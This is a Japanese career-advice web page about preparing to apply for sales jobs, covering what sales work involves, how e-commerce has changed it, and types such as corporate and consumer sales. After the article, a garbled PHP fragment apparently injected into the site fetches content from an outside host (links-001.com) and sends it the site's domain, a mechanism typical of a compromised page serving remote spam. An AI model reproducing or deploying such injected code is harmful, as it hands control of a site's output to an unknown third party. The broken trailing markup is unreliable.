前へ
次へ

転職で営業求人に応募するときの心構え

営業求人に応募する場合、そもそも営業がどんな仕事が知らないでは困ります。
営業は商品やサービス、もしくは情報を提案し、購入を促すのが仕事です。
ものを売るだけでなく情報も含まれるようになったのが現代の変化ですが、厳密に言うと販売職とは異なるもので、相手の悩みや課題に対してサポートするのが主な業務と言えます。
近年インターネットによるeコマースが普及し、消費行動にも大きな変化がありました。
一人ひとりが独自に商品やサービスを比較検討し、そのままインターネット通販で購入する環境があります。
それに伴い、営業の在り方も大きく変化しつつあります。
例えばeコマースのWebサイト運営を引き受けたり、セミナーやイベントなどを開催してマーケティングをおこなったりすることも営業テクニックの内となってきました。
よりいっそう顧客の悩みや課題を解決できる方法を自社商品で提示するスタイルが強くなったと言えますが、いかに形が変わろうとも営業の本質は「ひと相手」です。
インターネット環境では顧客の顔も見えませんが、それでもコミュニケーションスキルは必要ですし、よりいっそうのヒアリング能力も必要とされる時代と言えるでしょう。
もちろん、従来と変わらない営業スタイルを維持している企業も多数あります。
ただこうした時代背景を認識しているかどうか、そこは大きな違いとなって言動に現れることも意識しておきましょう。
営業求人にもさまざまな種類がありますが、主なものをピックアップしてみます。
まず法人営業ですが、これは企業に対して営業を行う仕事です。
商社や工場であったり流通であったりしますが、特に問題解決能力を求められますので転職時には意識が必要です。
個人営業は、個人消費者が対象の営業です。
額の大きなものとしては不動産や金融、車などが挙げられます。
ここでは特に対人関係を築く必要があるため、対人スキルを磨くことも大切です。
そのほかにも新規顧客を開拓する新規営業や取引相手にさらなる営業をかける既存営業などさまざまな種類があり、詳細や求められる内容は各企業によって異なります。
営業職と言っても取引先や営業方法で内容が異なるため、ミスマッチを避けるためには内部事情に精通した転職エージェントの利用が確実です。
自分の求める営業職を得るために、あらゆる手段を利用しましょう。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top